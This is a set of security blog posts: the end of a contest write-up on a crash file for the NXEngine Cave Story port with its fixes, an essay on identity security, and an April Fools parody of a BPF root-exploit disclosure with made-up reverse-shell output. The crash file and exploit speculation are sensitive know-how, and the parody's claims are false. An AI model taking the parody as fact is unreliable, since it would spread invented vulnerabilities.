this crash in the original NXEngine version of the code, and only if calling
<code class="language-plaintext highlighter-rouge">profile_load</code> directly from <code class="language-plaintext highlighter-rouge">main</code>. It won’t work if we let the game launch
normally and pick up the corrupt <code class="language-plaintext highlighter-rouge">profile.dat</code> file. As you can see, this crash
file consists of <em>only</em> the magic value.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>00000000: 446f 3034 3132 3230 Do041220
</code></pre></div></div>
<p>How does this lead to a crash? Easy! The original code doesn’t do any end of
file checking or error checking when reading the <code class="language-plaintext highlighter-rouge">profile.dat</code> file. When this
file is loaded, the <code class="language-plaintext highlighter-rouge">fgeti</code> and <code class="language-plaintext highlighter-rouge">fgetl</code> wrappers start returning random garbage
stack values instead. This is likely why the crash is inconsistent. For
whatever reason, when invoking the function directly, the garbage returned by
<code class="language-plaintext highlighter-rouge">fgeti</code> and <code class="language-plaintext highlighter-rouge">fgetl</code> leads to a crash, similar to the large crash, with a large
positive or negative <code class="language-plaintext highlighter-rouge">type</code> value. When loading the profile normally, it only
reads null bytes, which doesn’t cause a crash, until the parser fails and
rejects the file because of a lack of secondary magic value (the string “FLAG”)
further down in the file.</p>
<p>If we allow execution of this small crash to proceed until <code class="language-plaintext highlighter-rouge">fgetl</code> is called to
determine <code class="language-plaintext highlighter-rouge">type</code>, we can see the following in <code class="language-plaintext highlighter-rouge">gdb</code>.</p>
<pre><code class="language-gdb">(gdb) info locals
value = 32767
(gdb) p &value
$1 = (uint32_t *) 0x7fffffffc594
</code></pre>
<p>If we dump memory at that address, we see it’s just whatever garbage was
previously on the stack there.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>(gdb) x/16bx &value
0x7fffffffc594: 0xff 0x7f 0x00 0x00 0x00 0x27 0x5f 0x5e
0x7fffffffc59c: 0xaa 0x5b 0x49 0x7c 0x00 0xdf 0x55 0x55
</code></pre></div></div>
<p>Absent any checks, the <code class="language-plaintext highlighter-rouge">fgetl</code> and <code class="language-plaintext highlighter-rouge">fgeti</code> functions just return whatever is
on the stack. I’m speculating here, but this could be used as an information
leak, which could be combined with the out-of-bounds write in the weapon slots
to do some fun stuff, maybe.</p>
<h2 id="fixing-the-crash">Fixing the Crash</h2>
<p>First off, we check the results of the <code class="language-plaintext highlighter-rouge">fread</code> call and use that to determine
if we should bail early. If we hit an error or end of file when we don’t expect
it? Just stop trying to parse the file. Nothing good can come of it. In the
below example, you see we check that the amount of data read from the file is
what we expect and if not, we error out.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">uint32_t</span> <span class="nf">fgetl</span><span class="p">(</span><span class="kt">FILE</span> <span class="o">*</span><span class="n">fp</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">uint32_t</span> <span class="n">value</span><span class="p">;</span>
<span class="kt">int</span> <span class="n">ret</span> <span class="o">=</span> <span class="n">fread</span><span class="p">(</span><span class="o">&</span><span class="n">value</span><span class="p">,</span> <span class="mi">4</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="n">fp</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="n">ret</span> <span class="o">!=</span> <span class="mi">1</span><span class="p">)</span> <span class="p">{</span>
<span class="n">staterr</span><span class="p">(</span><span class="s">"fgetl: error reading uint32_t from file"</span><span class="p">);</span>
<span class="n">fclose</span><span class="p">(</span><span class="n">fp</span><span class="p">);</span>
<span class="n">exit</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span>
<span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
<span class="k">return</span> <span class="n">value</span><span class="p">;</span>
<span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>
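<p>As a variation on the same check, here is a minimal sketch of a read helper that reports failure to the caller instead of exiting. The name <code class="language-plaintext highlighter-rouge">read_u32</code> is hypothetical and not part of NXEngine; the sketch assumes nothing beyond standard C stdio.</p>

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>

/* Hypothetical helper, not NXEngine's API: read one 4-byte value from fp.
 * Like the fgetl above, the bytes are taken in host byte order.
 * On a short read or an error, *out is left untouched and false is returned,
 * so the caller never sees uninitialized stack contents. */
bool read_u32(FILE *fp, uint32_t *out)
{
    uint32_t value;

    if (fread(&value, sizeof(value), 1, fp) != 1) {
        return false;
    }
    *out = value;
    return true;
}
```

<p>A caller would stop parsing as soon as <code class="language-plaintext highlighter-rouge">read_u32</code> returns false, which keeps the decision about how to bail out in one place.</p>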
<p>Next, we want to make sure the weapon type is something we expect before we
start blindly writing to memory. The fix here is to check if <code class="language-plaintext highlighter-rouge">type</code> is within the
bounds of <code class="language-plaintext highlighter-rouge">MAX_WPN_SLOTS</code> and, if not, skip it. I didn’t include any logic to
keep chewing through the file, so it’s possible a corrupted save will cause the
file to get off by one byte, which would cause the wrong thing to be loaded.
But it shouldn’t crash anymore, so that’s probably fine.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">for</span><span class="p">(</span><span class="n">i</span><span class="o">=</span><span class="mi">0</span><span class="p">;</span><span class="n">i</span><span class="o"><</span><span class="n">MAX_WPN_SLOTS</span><span class="p">;</span><span class="n">i</span><span class="o">++</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">int</span> <span class="n">type</span> <span class="o">=</span> <span class="n">fgetl</span><span class="p">(</span><span class="n">fp</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">type</span><span class="p">)</span> <span class="k">break</span><span class="p">;</span>
<span class="k">if</span> <span class="p">(</span><span class="n">type</span> <span class="o"><</span> <span class="mi">0</span> <span class="o">||</span> <span class="n">type</span> <span class="o">>=</span> <span class="n">MAX_WPN_SLOTS</span><span class="p">)</span> <span class="p">{</span>
<span class="n">staterr</span><span class="p">(</span><span class="s">"profile_load: invalid weapon type %d"</span><span class="p">,</span> <span class="n">type</span><span class="p">);</span>
<span class="k">break</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>
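<p>The same validate-before-index pattern can be sketched in isolation. Everything here is illustrative: <code class="language-plaintext highlighter-rouge">WeaponSlot</code>, <code class="language-plaintext highlighter-rouge">mark_weapons</code>, and the value given to <code class="language-plaintext highlighter-rouge">MAX_WPN_SLOTS</code> are placeholders, not NXEngine’s definitions.</p>

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

/* Placeholder value for illustration; the real constant lives in NXEngine. */
#define MAX_WPN_SLOTS 8

/* Hypothetical stand-in for the per-weapon state the loader fills in. */
typedef struct {
    bool has_weapon;
} WeaponSlot;

/* Walk the raw weapon types read from a profile and mark each one in `slots`,
 * which must hold MAX_WPN_SLOTS entries. Stops at the first zero (end of
 * list) or the first out-of-range type. Returns how many were accepted. */
size_t mark_weapons(const int32_t *raw, size_t raw_len, WeaponSlot *slots)
{
    size_t accepted = 0;

    for (size_t i = 0; i < raw_len && i < MAX_WPN_SLOTS; i++) {
        int32_t type = raw[i];

        if (type == 0) {
            break; /* terminator, same as `if (!type) break;` above */
        }
        if (type < 0 || type >= MAX_WPN_SLOTS) {
            break; /* reject before the value is ever used as an index */
        }
        slots[type].has_weapon = true;
        accepted++;
    }
    return accepted;
}
```

<p>Feeding it the <code class="language-plaintext highlighter-rouge">32767</code> seen in the <code class="language-plaintext highlighter-rouge">gdb</code> session stops the loop instead of writing far past the end of the array.</p>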
<h2 id="tallying-the-score">Tallying the Score</h2>
<p>So we have two scores here, I’d say. One for the large crash (that works out of
the box on the current package for both Linux and HaikuOS) and the other,
smaller, crash which takes some luck to get going.</p>
<h3 id="large-crash">Large Crash</h3>
<ul>
<li>+4096 - 60 = +4036 points for the binary size</li>
<li>+1024 writeup</li>
<li>+4096 patches merged (<sup id="fnref:pr1" role="doc-noteref"><a href="#fn:pr1" class="footnote" rel="footnote">3</a></sup>, <sup id="fnref:pr2" role="doc-noteref"><a href="#fn:pr2" class="footnote" rel="footnote">4</a></sup>, <sup id="fnref:pr3" role="doc-noteref"><a href="#fn:pr3" class="footnote" rel="footnote">5</a></sup>, <sup id="fnref:pr4" role="doc-noteref"><a href="#fn:pr4" class="footnote" rel="footnote">6</a></sup>)</li>
</ul>
<p><strong>Total: 9156</strong></p>
<h3 id="small-crash">Small Crash</h3>
<ul>
<li>+4096 - 8 = +4088</li>
<li>+1024 writeup</li>
<li>+4096 patches merged</li>
</ul>
<p><strong>Total: 9208</strong></p>
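<p>The arithmetic in both tallies follows one pattern, sketched below. The function name is made up, and it assumes the 60 and 8 above are file sizes in bytes and that the two bonuses are all-or-nothing, which is how the lists read.</p>

```c
/* Hypothetical helper mirroring the tallies above: 4096 minus the entry
 * size, plus 1024 for a writeup and 4096 for a merged patch. */
int bggp3_score(int size_bytes, int has_writeup, int has_patch)
{
    int score = 4096 - size_bytes;

    if (has_writeup) {
        score += 1024;
    }
    if (has_patch) {
        score += 4096;
    }
    return score;
}
```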
<h3 id="do-i-win">Do I win?</h3>
<p>The small crash probably doesn’t count, and I don’t know if crashing the Cave
Story port on HaikuOS is more or less comical than crashing GnuCOBOL, so I may
need another way to beat Remy’s score of 9176.<sup id="fnref:remirino" role="doc-noteref"><a href="#fn:remirino" class="footnote" rel="footnote">7</a></sup></p>
<h3 id="results-update">Results Update</h3>
<p>The official results are in!<sup id="fnref:awinnerisu" role="doc-noteref"><a href="#fn:awinnerisu" class="footnote" rel="footnote">8</a></sup> The scorer accepted my smaller crash,
giving me a slight edge over Remy and putting me in fourth place! Shoutout to
<a href="https://retr0.id/retr0id">retr0id</a> for his first place chip8 bug. While you’re
there, check out his MD5 PNG hashquine. It makes a great phone background!</p>
<h1 id="references">References</h1>
<div class="footnotes" role="doc-endnotes">
<ol>
<li id="fn:bggp3" role="doc-endnote">
<p><a href="https://tmpout.sh/bggp/3/">https://tmpout.sh/bggp/3/</a> <a href="#fnref:bggp3" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:csru" role="doc-endnote">
<p><a href="https://exlmoto.ru/nxengine/">https://exlmoto.ru/nxengine/</a> <a href="#fnref:csru" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:pr1" role="doc-endnote">
<p><a href="https://github.com/EXL/NXEngine/pull/9">https://github.com/EXL/NXEngine/pull/9</a> <a href="#fnref:pr1" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:pr2" role="doc-endnote">
<p><a href="https://github.com/nxengine/nxengine-evo/pull/272">https://github.com/nxengine/nxengine-evo/pull/272</a> <a href="#fnref:pr2" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:pr3" role="doc-endnote">
<p><a href="https://github.com/nxengine/nxengine-evo/pull/273">https://github.com/nxengine/nxengine-evo/pull/273</a> <a href="#fnref:pr3" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:pr4" role="doc-endnote">
<p><a href="https://github.com/EXL/NXEngine/pull/10">https://github.com/EXL/NXEngine/pull/10</a> <a href="#fnref:pr4" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:remirino" role="doc-endnote">
<p><a href="https://remyhax.xyz/posts/bggp3-cob/">https://remyhax.xyz/posts/bggp3-cob/</a> <a href="#fnref:remirino" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:awinnerisu" role="doc-endnote">
<p><a href="https://github.com/netspooky/BGGP/tree/main/2022">https://github.com/netspooky/BGGP/tree/main/2022</a> <a href="#fnref:awinnerisu" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
</ol>
</div>
<p>Friday Ortiz</p>
<p>TL;DR: Cave Story for HaikuOS go SEGV.</p>
<p><strong>whoami, who am I? Thoughts on protecting digital and human identities.</strong></p>
<p>2022-04-26T05:00:00+00:00</p>
<p>https://ortiz.sh/identity/2022/04/26/WHOAMI</p>
<p><strong>TL;DR:</strong> What is identity security, why we often do it wrong, and how we can get it right.</p>
<p>I started digging into identity and identity security concepts earlier this
year in order to help my employer integrate more identity-based security
controls and telemetry into its products. I’ve dabbled in identity for years,
but I’d never formally studied it. Naturally, I started reading whitepapers,
blogs, and websites, and learned a ton in the process. However, I also came
away with the sense that we’re collectively making a lot of the same mistakes
about identity.</p>
<p>In this article, I’m going to explore some existing definitions of identity,
attempt to land on my own definition, and discuss where things can go right or
wrong.</p>
<h2 id="so-what-the-hecks-an-identity">So, what the heck’s an identity?</h2>
<p>How do we answer this question? Let’s start with the prior art. What does
existing literature say an identity is? Here’s a pair of examples:</p>
<p>In their 2010 book <em>Identity Management: Concepts, Technologies, and Systems</em><sup id="fnref:imc" role="doc-noteref"><a href="#fn:imc" class="footnote" rel="footnote">1</a></sup>,
Elisa Bertino and Kenji Takahashi defined identity as information about an
entity that is sufficient to identify that entity in a particular context. Dr.
Omondi Orondo, on the other hand, defines it in <em>Identity & Access Management: A
Systems Engineering Approach</em> as a system representation (or abstraction) of a
human being acting on the IAM system<sup id="fnref:orm" role="doc-noteref"><a href="#fn:orm" class="footnote" rel="footnote">2</a></sup>.</p>
<p>What happens when we look outside of the technology industry? Other disciplines
study identity too! Dr. James Fearon published a draft paper in 1999 called
<em>What is identity (as we now use the word)?</em><sup id="fnref:wat" role="doc-noteref"><a href="#fn:wat" class="footnote" rel="footnote">3</a></sup>, which summarizes many definitions
of identity from across many publications. For example, Hogg and Abrams defined
identity in 1988 as “people’s concepts of who they are, of what sort of people
they are, and how they relate to others.” That won’t work for us infosec folks,
because we need to incorporate machine identities that don’t (yet?) have a
sense of self. In Dr. Fearon’s own words, “the range, complexity, and
differences among these various formulations are remarkable.”</p>
<p>Here’s the thing: these definitions leave a lot to be desired. In the context
of their respective textbooks or publications, they make sense and work, but
they don’t generalize very well. Ultimately, they raised some questions for me,
and with that in mind, I’d like to propose my own definition that answers those
questions. The questions I have are:</p>
<ul>
<li>Can we define identity without using the words identity or identify?</li>
<li>How do we account for non-human entities and their identities?</li>
<li>Is an identity really a one-to-one mapping, as these definitions imply?</li>
</ul>
<p>The first question refers to tautological definitions. We’re defining identity
with identity, or with identity and access management (IAM). We need a more
fundamental definition.</p>
<p>The second question relates to the plethora of purely non-human identities we
commonly deal with. How do we account for those? Lots of definitions simply
don’t.</p>
<p>And finally, the third question relates to a common assumption among many
authors, companies, and technologies: one entity has one identity, and you can
affirmatively identify the entity with that… identity. This doesn’t hold up
in practice.</p>
<h2 id="well-do-it-live">We’ll do it live</h2>
<p>Let’s make our own definition! How should we do that? Well, to start, we’ll
actually need to define two terms. Keep in mind that my perspective is colored
by the lens of defensive security research, so these definitions may not be
applicable to all situations. Still, they’re what I try to keep in mind when
I’m doing identity work.</p>
<ul>
<li><strong>Participant</strong>: any entity capable of <em>acting upon</em> or <em>being acted upon</em>
by any other entity.</li>
<li><strong>Identity</strong>: any set of information that fully describes a participant or
<em>set of participants</em> in a <em>particular context</em>.</li>
</ul>
<p>Those two definitions imply the following:</p>
<ol>
<li>Participants are not all humans.</li>
<li>Participants may be entirely passive.</li>
<li>Participant-to-Identity can be a one-to-one, one-to-many, many-to-one, or many-to-many relationship, or anything in between.</li>
</ol>
<p>Participants do <em>stuff</em> to other participants. This <em>doing of stuff</em> exposes
information that can be used to identify participants and construct an identity
for them.</p>
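<p>One way to make these two definitions concrete is as a pair of data structures. This is only a sketch of how I read them: the type names, fields, and the fixed member cap are all invented for illustration.</p>

```c
#include <stdbool.h>
#include <stddef.h>

#define MAX_MEMBERS 4 /* arbitrary cap for this sketch */

typedef struct {
    int id;
    bool is_human; /* participants are not all humans */
} Participant;

typedef struct {
    const char *context;         /* the particular context the identity holds in */
    const char *description;     /* the information that describes the members */
    int member_ids[MAX_MEMBERS]; /* one participant, or a set of them */
    size_t member_count;
} Identity;

/* Does this identity describe the given participant? */
bool identity_covers(const Identity *identity, const Participant *participant)
{
    for (size_t i = 0; i < identity->member_count && i < MAX_MEMBERS; i++) {
        if (identity->member_ids[i] == participant->id) {
            return true;
        }
    }
    return false;
}

/* How many identities describe this participant? More than one is normal. */
size_t identities_for(const Identity *identities, size_t count,
                      const Participant *participant)
{
    size_t matches = 0;

    for (size_t i = 0; i < count; i++) {
        if (identity_covers(&identities[i], participant)) {
            matches++;
        }
    }
    return matches;
}
```

<p>Because an identity holds a set of members and a participant can appear in many identities, the structure allows every mapping from the list above without special cases.</p>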
<h2 id="how-should-we-digitize-identity">How <em>should</em> we digitize identity?</h2>
<p>Again, this is from a defensive security researcher’s perspective. When we talk
about digitizing identity, we have to work with what we have. And what we have
is security telemetry. So how do we digitize identity using security telemetry?
Security telemetry actually gives us a lot of what we need to start digitizing
identity.</p>
<p>We can collect the stuff participants do and the information exposed during
these actions. The information exposed can be thought of as a passive identity
or identifier, and the stuff participants do can be thought of as an active
identity or identifier. With one or both—and inside of a specific context—we
can use the information and actions exposed through security telemetry to fully
describe participants or sets of participants. Whatever form this description
takes? That’s your digitized identity.</p>
<h2 id="what-can-we-do-with-a-digitized-identity">What can we do with a digitized identity?</h2>
<p>Now that we have our digitized identities, what can we actually do with them?
For this to be a worthwhile endeavor, that digitized identity artifact needs to
be useful. We can lean on the active-passive distinction to guide us here.</p>
<h3 id="active-identities-are-for-alerting-something-you-do">Active identities are for alerting (something you do)</h3>
<p>If you want to get alerted when an identity does something it’s not supposed to
do, active identities are your friend here. An active identity describes a
participant by what it does. If you know what a participant is supposed to do
(or supposed to not do), you can build and check active identities. You can
think of an active identity as “User A frequently logs in to Server B.” Behavior
that departs from that description might trigger a security alert.</p>
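<p>A toy version of that check might look like the following. It assumes the active identity has already been reduced to a list of expected user and server pairs; the type and function names are hypothetical.</p>

```c
#include <stdbool.h>
#include <stddef.h>
#include <string.h>

/* One line of an active identity: "this user logs in to this server". */
typedef struct {
    const char *user;
    const char *server;
} ExpectedLogin;

/* Returns true when the observed login matches the active identity.
 * A false result is a candidate for an alert, not proof of evil. */
bool login_is_expected(const ExpectedLogin *expected, size_t count,
                       const char *user, const char *server)
{
    for (size_t i = 0; i < count; i++) {
        if (strcmp(expected[i].user, user) == 0 &&
            strcmp(expected[i].server, server) == 0) {
            return true;
        }
    }
    return false;
}
```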
<h3 id="passive-identities-are-for-baselining-and-discovery-something-you-are">Passive identities are for baselining and discovery (something you are)</h3>
<p>If you want to get more nebulous identity insights into a particular
environment, passive identities will have your answers. You can think of a
passive identity as “User A and User B typically work on the same projects.” I
find it easier to explain this with questions, so here are a few questions you
might answer with passive identities.</p>
<ul>
<li>What does my environment’s identity network look like?</li>
<li>Is this participant who we expect them to be?</li>
<li>What other participants does this participant routinely interact with?</li>
</ul>
<p>Passive identities let you build fun things like identity network graphs and
identity profiles, which you can combine with active identities to start asking
and answering these questions and more.</p>
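<p>As a rough sketch of the identity network idea, the graph can be as simple as a matrix of interaction counts between participants. The names, the fixed size, and the notion of a “routine” threshold are assumptions made for the example.</p>

```c
#include <stddef.h>

#define MAX_PARTICIPANTS 8 /* arbitrary cap for this sketch */

/* interactions[a][b] counts how often participants a and b were seen together. */
typedef struct {
    unsigned interactions[MAX_PARTICIPANTS][MAX_PARTICIPANTS];
} IdentityGraph;

/* Record one observed interaction; the relationship is treated as symmetric. */
void graph_record(IdentityGraph *graph, size_t a, size_t b)
{
    if (a >= MAX_PARTICIPANTS || b >= MAX_PARTICIPANTS || a == b) {
        return;
    }
    graph->interactions[a][b]++;
    graph->interactions[b][a]++;
}

/* Count the peers a participant has interacted with at least
 * min_interactions times, i.e. who it "routinely" interacts with. */
size_t graph_routine_peers(const IdentityGraph *graph, size_t participant,
                           unsigned min_interactions)
{
    size_t peers = 0;

    if (participant >= MAX_PARTICIPANTS) {
        return 0;
    }
    for (size_t other = 0; other < MAX_PARTICIPANTS; other++) {
        if (other != participant &&
            graph->interactions[participant][other] >= min_interactions) {
            peers++;
        }
    }
    return peers;
}
```

<p>The third question in the list above then becomes a single call to <code class="language-plaintext highlighter-rouge">graph_routine_peers</code> with whatever threshold counts as routine in your environment.</p>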
<h2 id="welcome-to-the-identity-machine">Welcome to the [Identity] Machine</h2>
<p>This is where machine learning (ML) comes into play. We can ask and answer a
lot of good questions manually, or with heuristics, but at a certain scale, that
becomes intractable. From my (again, biased) perspective, there are three main
ways we can leverage machine learning to understand identities.</p>
<ul>
<li>We can enrich identifying information to build meta-identities. For example, we can cluster and build identities for virtual teams within an organization that don’t follow the org chart, giving you ground truth on how people are working together.</li>
<li>We can contextualize information with relevant identifiers, whatever they may be. For example, if you’re reviewing a suspicious firewall alert (which, let’s be honest, is almost definitely a false positive), it might be helpful to know who is making that connection and if this falls in line with their expected behavior. Think of how many alerts you can filter out just by enriching them with identity information.</li>
<li>We can automate the asking and answering of difficult questions. With meta-identities and identity-enriched context, we’re in a good spot to automate a ton of identity-related questions and tasks. What that automation looks like depends on the identity problems you’re trying to solve, but I’m sure if you made it this far you can come up with something.</li>
</ul>
<h2 id="show-me">Show me</h2>
<p>I’d like to close by putting it all together with a concrete example. We’ll ask
a deceptively simple question: when someone logs into a server, are they doing
it from a place we expect? If you’ve worked with IP reputation, IP geolocation,
and improbable travel modeling, you know trying to answer this manually or with
heuristics can be tricky.</p>
<p>Well, using security telemetry alone, we can answer this question. The first
step is to gather up all our active and passive identifiers and build out an
identity network. This will include employees, but also workstations, servers,
offices, service accounts, and so on. The different attributes or pieces of
information in these active and passive identities will be the features for our
machine learning pipeline. With these features, we can now model and solve this
question as a machine learning problem.</p>
<p>Now, if you’ve worked with ML on these kinds of problems before, you’ll know
that this alone will generate a ton of false positives. Anomaly detection
algorithms detect anomalies, not evil. Anomaly detection doesn’t know what your
goals are, it just knows what’s normal and what isn’t. This is where our
meta-identities from the previous section can really help us out. By
intelligently constructing our ML architecture and incorporating those enriched
features, we can alert, for example, when an unexpected virtual team accesses a
server, instead of an unexpected individual human. Alternatively, we can
automatically cluster a group of servers that leverage service accounts to
perform periodic tasks, even without an explicit organizational definition.
This significantly cuts down on the noise generated by the ML model, and gives
us a good artifact to automate.</p>
<p>With the automated ML pipeline done, we can expose this model as a tool that
analysts can query during an investigation. When an analyst starts
triaging this suspicious logon firewall alert (which triggered on some
out-of-date, inaccurate IP geolocation list), they can run it through the model. In
addition to getting a classification out of the model (is this expected or
not?), they can also dig into the meta-identities and other enriched
information used.<sup id="fnref:aix" role="doc-noteref"><a href="#fn:aix" class="footnote" rel="footnote">4</a></sup></p>
<p>After a few iterations, the human analyst will probably have a good idea of
what heuristics they need and what manual investigation they perform when they
get these alerts, and the whole process (or at least a meaningful subset of the
process) can be automated. We can extend this same model and/or process to
other questions as well. Essentially, we are looking for various statistical
outliers in different clusters. For example, based on their team, should a user
be running a certain binary? Should they be reading a certain document? Do they
typically send more external or internal emails? What do their inbox rules
usually look like? Which teams are using what SaaS applications? Each of these
might require independent modeling and analyst review.</p>
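<p>To make “statistical outliers in different clusters” a little more concrete, here is a deliberately simple stand-in: a z-score style test against the other members of one cluster. It is not the ML pipeline described above, and the function name and threshold parameter are invented for the sketch.</p>

```c
#include <stdbool.h>
#include <stddef.h>

/* Flag `value` when it sits more than k standard deviations away from the
 * mean of its cluster. Squared quantities are compared so no sqrt is needed.
 * With fewer than two samples there is no baseline, so nothing is flagged. */
bool is_cluster_outlier(const double *cluster, size_t count,
                        double value, double k)
{
    double mean = 0.0;
    double variance = 0.0;
    double deviation;

    if (count < 2) {
        return false;
    }
    for (size_t i = 0; i < count; i++) {
        mean += cluster[i];
    }
    mean /= (double)count;

    for (size_t i = 0; i < count; i++) {
        double d = cluster[i] - mean;
        variance += d * d;
    }
    variance /= (double)count; /* population variance of the cluster */

    deviation = value - mean;
    if (variance == 0.0) {
        return deviation != 0.0; /* every member identical: any change stands out */
    }
    return deviation * deviation > k * k * variance;
}
```

<p>Here <code class="language-plaintext highlighter-rouge">cluster</code> might hold, say, weekly external email counts for one virtual team. As noted earlier, a hit only means unusual, so it still needs an analyst or more context before it means anything.</p>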
<h2 id="you-write-too-much-summarize-it-for-me">You write too much. Summarize it for me?</h2>
<p>No problem, lazy straw person! Everyone has their own definition of identity,
based on their use case, so we’re not doing anything too radical by reframing
identity to better help us solve security problems. From a security
perspective, identities are highly contextual relationships between
participants characterized by what they do to each other. Embracing identities
in security telemetry by describing them as they are as opposed to prescribing
them as we believe they should be gives us a lot of flexibility and power. We
can take advantage of that flexibility and power to find evil, and protect
users and customers.</p>
<div class="footnotes" role="doc-endnotes">
<ol>
<li id="fn:imc" role="doc-endnote">
<p>This is a more traditional IAM book and a fairly easy read. Details on <a href="https://books.google.com/books/about/Identity_Management.html?id=UrmD-Gxt-8IC">Google Books</a>. <a href="#fnref:imc" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:orm" role="doc-endnote">
<p>It’s an interesting perspective that is worth checking out. You can find details <a href="https://books.google.com/books/about/Identity_Access_Management.html?id=ajb2oAEACAAJ">about the book here</a>. <a href="#fnref:orm" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:wat" role="doc-endnote">
<p>It’s apparently been in a draft since 1999, but you can <a href="https://web.stanford.edu/group/fearon-research/cgi-bin/wordpress/wp-content/uploads/2013/10/What-is-Identity-as-we-now-use-the-word-.pdf">read it here</a>. <a href="#fnref:wat" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:aix" role="doc-endnote">
<p>If you’re interested in this concept in general, the keyword to search for is “AI explainability.” Great projects like <a href="https://github.com/Trusted-AI/AIX360">AIX360</a> need more contributors. <a href="#fnref:aix" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
</ol>
</div>
<p>Friday Ortiz</p>
<p>TL;DR: What is identity security, why we often do it wrong, and how we can get it right.</p>
<p><strong>BeeSTrING: Critical Vulnerability in BPF Subsystem Allows Fully Unauthenticated RCE as Root</strong></p>
<p>2022-04-01T05:00:00+00:00</p>
<p>https://ortiz.sh/clout/2022/04/01/NEW-HOTNESS</p>
<p><strong>TL;DR:</strong> Look at the publication date, I’m fucking with you.</p>
<p>This is a guest post from an anonymous security researcher that I overheard
talking about BPF at a cafe that I’m sitting at right now. They were wearing a
hooded sweatshirt and talking with their mother on the phone in some weird
tonal language (their computer also had characters I didn’t recognize, which
confused and frightened me) so we should all assume that they’re an elite
Chinese government agent hacker (maybe Russian, I’m honestly pretty racist),
and take the following information very very seriously.</p>
<h1 id="beestring">BeeSTrING</h1>
<p>I’m calling this vulnerability BeeSTrING because bees are cute (I like
bees<sup id="fnref:bees" role="doc-noteref"><a href="#fn:bees" class="footnote" rel="footnote">1</a></sup>), and bee sounds like the B in BPF. The <code class="language-plaintext highlighter-rouge">string</code> part comes from
how the vulnerability works (I think lol) and the capitalization makes STING,
which is a thing bees do! I want this to be taken very very seriously (have I
mentioned that?) and make me very very popular, so it needs a cute catchy name.</p>
<p>My primary motivation for sharing this is that eBPF is incredibly trendy right
now, and also the severity of the vulnerability means that businesses
everywhere should take note and do something about it. I’m not sure what, but
definitely something. As of writing this, there is no patch and impact is
unclear. But I’m hoping by bringing this incredibly severe vulnerability to
light, the security community will step in and do what they do best:
leverage this for vendor blogspam and marketing email FUD.</p>
<p>Keep in mind that everything I’m writing here is from a broken conversation
with some scary looking dude I met at a cafe downtown, so treat it as wild
rumor and speculation. But also be afraid and take it seriously. Do both, or
I’ll tweet a hot take about how much you suck at your job when you get popped
if I don’t like your company. If I do like your company I’ll probably tweet
something with #hugops. Basically just be cool and you’ll be fine.</p>
<p>Before getting into how this works, you should note that I want you to think
this is related to a recent BPF vulnerability,
<a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23222">CVE-2022-23222</a>,
that also affects the BPF verifier. It isn’t, but I want you to think that it
is.</p>
<h1 id="how-it-works">How It Works</h1>
<p>A properly crafted BPF program with a specific malicious string can be tossed
at a Linux system running literally any kernel version ever (even the ones
without BPF, somehow) in a series of UDP packets. The crafted BPF program will
be passed to the BPF verifier, whereupon the malicious embedded string will
spawn a reverse shell as root to the attacker.</p>
<h1 id="poc">POC</h1>
<p>They graciously provided me with a copy of their code that I could host on my
own repository. I haven’t looked at it because it has scary foreign characters,
but I did run it. The root shell makes a sweet screenshot for twitter, so you
should also run it.</p>
<p>You can find a link to it <a href="https://github.com/FridayOrtiz/BeeSTrING">here</a>. I
will probably also tweet about it if I remember, <a href="https://twitter.com/FridayOrtiz">so give me a follow
too</a>. But don’t bother clicking stuff, I have
a snippet of the POC in action right here.</p>
<p>The setup for the POC is a vagrant lab with two virtual machines running the
latest, fully patched, Ubuntu 22.04 LTS. The victim VM is on <code class="language-plaintext highlighter-rouge">100.69.42.13</code> and
the attacker machine is on <code class="language-plaintext highlighter-rouge">100.69.42.12</code> (because BPF is democratizing
CGNAT!).</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ git clone https://github.com/RafaelortizRC/BeeSTrING
$ cd BeeSTrING
$ make
$ ./exploit --help
┏┓ ┏━╸┏━╸┏━┓╺┳╸┏━┓╻┏┓╻┏━╸
┣┻┓┣╸ ┣╸ ┗━┓ ┃ ┣┳┛┃┃┗┫┃╺┓
┗━┛┗━╸┗━╸┗━┛ ╹ ╹┗╸╹╹ ╹┗━┛
~ by @FridayOrtiz && some other guy ~
usage: exploit <your IP> <victim IP>
FOR EDUCATIONAL PURPOSES ONLY ;)
happy hackin'!
$ ./exploit 100.69.42.12 100.69.42.13
...hackin'
...hackin'...
hackin'...
done!
# ip a
5: virbr0: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc noqueue state UP group default qlen 1000
link/ether [REDACTED] brd ff:ff:ff:ff:ff:ff
inet 100.69.42.13/10 brd [REDACTED] scope global virbr0
valid_lft forever preferred_lft forever
# whoami
root
# id
uid=0(root) gid=0(root) groups=0(root)
# ^D
$ echo 'awesome!'
awesome!
</code></pre></div></div>
